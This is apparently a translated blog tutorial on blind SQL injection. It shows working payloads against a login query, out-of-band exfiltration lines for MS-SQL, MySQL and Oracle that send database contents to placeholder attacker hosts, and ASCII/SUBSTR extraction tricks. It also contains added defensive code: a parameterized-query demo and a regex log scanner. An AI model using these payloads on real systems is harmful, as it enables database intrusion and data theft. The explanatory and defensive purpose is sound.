Out-of-Band Channel Use Scenario
In many cases of SQL injection, the application does not return the results of an injected query in its page, nor does it return any error messages generated by the database. Even though a SQL injection flaw exists, it can then appear that it cannot be exploited to extract any data or perform any other action.
For example:
Suppose a vulnerable login form, where the username and password fields are both vulnerable to SQL injection. There are many circumstances in which we may be able to inject an arbitrary query but not retrieve its results.
SELECT * FROM users WHERE username = 'kullanici' and password = 'sifre'
We can inject an entirely separate subquery, using string concatenation to join its results to the item we control (without bypassing the login).
Payload:
sifre' || (SELECT 1 FROM dual WHERE (SELECT username FROM all_users WHERE username = 'admin') = 'admin')--
Query:
SELECT * FROM users WHERE username = 'kullanici' and password = 'sifre' || (SELECT 1 FROM dual WHERE (SELECT username FROM all_users WHERE username = 'admin') = 'admin')--'
The login will fail, but our injected query will have been executed. All we receive back in the application's response is the standard login error message. What we then need is a way to retrieve the results of our injected query.
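As an added example (not part of the original post), the concatenated login query above beside a parameterized version, run against an in-memory SQLite database that stands in for the page's back end (an assumption; SQLite has no dual or all_users table, so the page's Oracle payload cannot succeed here, which is exactly what makes the contrast visible): with concatenation the payload is parsed as SQL and the engine rejects the unknown table, while with bound parameters the same string is compared as a literal password and simply finds no row.

```python
import sqlite3

# Constructed stand-in for the page's login back end: an in-memory SQLite
# table (assumption; the page's example targets Oracle).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('kullanici', 'sifre')")
    conn.commit()
    return conn

# The page's own payload, as it would arrive in the password field.
PAGE_PAYLOAD = ("sifre' || (SELECT 1 FROM dual WHERE "
                "(SELECT username FROM all_users WHERE username = 'admin') = 'admin')--")

def login_concat(conn, username, password):
    """Vulnerable form: the page's query assembled by string concatenation.
    Returns ('rows', count) when the statement ran, or ('error', message)
    when the engine rejected it."""
    sql = ("SELECT * FROM users WHERE username = '" + username
           + "' and password = '" + password + "'")
    try:
        return ("rows", len(conn.execute(sql).fetchall()))
    except sqlite3.OperationalError as exc:
        # The injected subquery reached the SQL parser; it fails only because
        # this engine has no table named dual / all_users.
        return ("error", str(exc))

def login_param(conn, username, password):
    """Hardened form: bound parameters. Whatever the password field contains
    is compared as a value and never parsed as SQL."""
    sql = "SELECT * FROM users WHERE username = ? and password = ?"
    return ("rows", len(conn.execute(sql, (username, password)).fetchall()))

if __name__ == "__main__":
    db = make_db()
    print(login_concat(db, "kullanici", "sifre"))        # ('rows', 1)
    print(login_concat(db, "kullanici", PAGE_PAYLOAD))   # ('error', 'no such table: ...')
    print(login_param(db, "kullanici", PAGE_PAYLOAD))    # ('rows', 0)
```

The "error" branch is the tell: the application would show only its generic login failure, yet the attacker-supplied text was already handed to the SQL parser. The parameterized version produces the same failed login for the legitimate reason, namely that no such password exists.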
Batch queries are useful because they allow us to execute an entirely separate statement over which we have full control, using a different SQL verb and targeting a different table. However, the results of an injected query still cannot be retrieved directly.
One method for retrieving data that is often effective in this situation is to use an out-of-band channel. Having achieved the ability to execute arbitrary SQL statements within the database, it is often possible to leverage some of the database's built-in functionality to create a network connection back to our own computer, over which we can transmit arbitrary data gathered from the database.
MS-SQL:
insert into openrowset('SQLOLEDB','DRIVER={SQL Server};SERVER=attackersite.com,80;UID=as;PWD=letme','select * from tablo') values (@@version)
The query causes the target database to open a connection to the attacker's database and insert the version string of the target database into the table called tablo.
MYSQL:
select * into outfile '\\\\attackersite.com\\path\\output.txt' from users;
ORACLE:
UTL_HTTP.request('attacker.site:80/'||(SELECT%20username%20FROM%20all_users%20WHERE%20ROWNUM%3d1))
This URL causes UTL_HTTP to make a GET request for a URL containing the first username in the table all_users.
Retrieving Data as Numbers
SQL injection may still exist in numeric data fields, where the input is not enclosed in single quotes. In that case we can still read string data by turning it into a numeric response from the application.
Each of the following expressions returns the string ba:
Oracle: SUBSTR('foobar', 4, 2)
Microsoft: SUBSTRING('foobar', 4, 2)
PostgreSQL: SUBSTRING('foobar', 4, 2)
MySQL: SUBSTRING('foobar', 4, 2)
Or, to get a number back, convert the character to its ASCII code:
ASCII(SUBSTR('Ali',1,1)) returns 65.
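From the defender's side, both the out-of-band functions above (openrowset, INTO OUTFILE, UTL_HTTP.request) and the character-to-number conversion in this section leave recognisable traces in request parameters. The following is an added example, not code from the original post: a small scanner that URL-decodes each request's query string and flags those indicators over a handful of constructed access-log lines. The log format, the IP addresses and the regular expressions are assumptions for illustration, not a complete signature set.

```python
import re
from urllib.parse import unquote

# Indicators drawn from the techniques described on this page
# (assumption: illustrative patterns, not an exhaustive ruleset).
INDICATORS = {
    "mssql_openrowset": re.compile(r"\bopenrowset\s*\(", re.I),
    "mysql_outfile":    re.compile(r"\binto\s+outfile\b", re.I),
    "oracle_utl_http":  re.compile(r"\butl_http\.request\s*\(", re.I),
    "char_to_number":   re.compile(r"\bascii\s*\(\s*substr(ing)?\s*\(", re.I),
}

def normalise(raw):
    """URL-decode twice (catches double-encoded input) and collapse whitespace,
    so that %20 / %3d obfuscation does not hide the keywords."""
    return re.sub(r"\s+", " ", unquote(unquote(raw)))

def scan_request(raw_query_string):
    """Return the names of all indicators matching one request's query string."""
    text = normalise(raw_query_string)
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def scan_log(lines):
    """Run scan_request over constructed access-log lines of the form
    '<ip> - - "<METHOD> <path>[?<query>] HTTP/1.1" <status>' and return
    (line, hits) pairs for every line with at least one hit."""
    findings = []
    for line in lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP', line)
        if not m:
            continue
        path = m.group(1)
        query = path.split("?", 1)[1] if "?" in path else ""
        hits = scan_request(query)
        if hits:
            findings.append((line, hits))
    return findings

# Constructed sample log: two benign requests, then the page's four payload
# shapes URL-encoded as they would appear in a GET parameter.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /search?q=laptops HTTP/1.1" 200',
    '10.0.0.7 - - "POST /login HTTP/1.1" 302',
    '10.0.0.9 - - "GET /item?id=1;insert%20into%20openrowset(%27SQLOLEDB%27,%27DRIVER={SQL%20Server};'
    'SERVER=attackersite.com,80;UID=as;PWD=letme%27,%27select%20*%20from%20tablo%27)%20values%20(@@version) HTTP/1.1" 500',
    '10.0.0.9 - - "GET /item?id=1;select%20*%20into%20outfile%20%27%5c%5cattackersite.com%5cpath%5coutput.txt%27%20from%20users HTTP/1.1" 500',
    '10.0.0.9 - - "GET /item?id=UTL_HTTP.request(%27attacker.site:80/%27||(SELECT%20username%20FROM%20all_users%20WHERE%20ROWNUM%3d1)) HTTP/1.1" 200',
    '10.0.0.9 - - "GET /item?id=ASCII(SUBSTR(%27Ali%27,1,1)) HTTP/1.1" 200',
]

if __name__ == "__main__":
    for line, hits in scan_log(SAMPLE_LOG):
        print(hits, line)
```

The decode-before-match step matters: the Oracle payload on this page is already shown with %20 and %3d, and a rule matched against the raw query string would miss it. In a real deployment the same patterns would also be worth applying to the database's own query log, where the out-of-band statements appear in plain text regardless of how the web request was encoded.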
I wrote about advanced SQLi in this article. I looked at my notes and wrote this article, so I don't remember some references. I hope I wrote clearly. If I made a mistake, forgive me and tell me :D Good days.